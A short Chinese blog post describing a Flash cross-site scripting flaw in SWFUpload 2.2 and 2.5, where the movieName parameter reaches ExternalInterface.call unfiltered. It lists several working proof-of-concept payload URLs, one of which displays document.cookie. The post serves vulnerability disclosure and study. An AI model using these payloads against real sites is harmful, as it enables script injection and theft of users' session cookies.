Solo  当前访客:4 开始使用

swfupload xss漏洞


1、出问题的版本包括 V2.2\V2.5

2、查看漏洞效果

由于swfupload.swf未对actionscript函数ExternalInterface.call传入的值进行判断和过滤,可以通过构造javascript语句通过ExternalInterface.call函数传递到flash文件中,造成flash跨站。Payload如下:

swfupload.swf?movieName=aaa"])}catch(e){(alert)(1)};//

swfupload.swf?movieName=aaa"])}catch(e){alert(1)};//

swfupload.swf?movieName="])}catch(e){if(!window.x){window.x=1;(alert)(1)}}//

swfupload.swf?movieName="])}catch(e){if(!window.x){window.x=1;alert(1)}}//

http://localhost:9000/javascripts/swfupload.swf?movieName=%22%5D)%7Dcatch(e)%7Bif(!window.x)%7Bwindow.x=1;alert(document.cookie)%7D%7D//

3、修复版本

下载

4、flash xss漏洞及相关知识点

https://wizardforcel.gitbooks.io/xss-naxienian/content/14.html


标题:swfupload xss漏洞
作者:hugh0524
地址:https://blog.uproject.cn/articles/2016/12/14/1481689313203.html

, , , , 0 0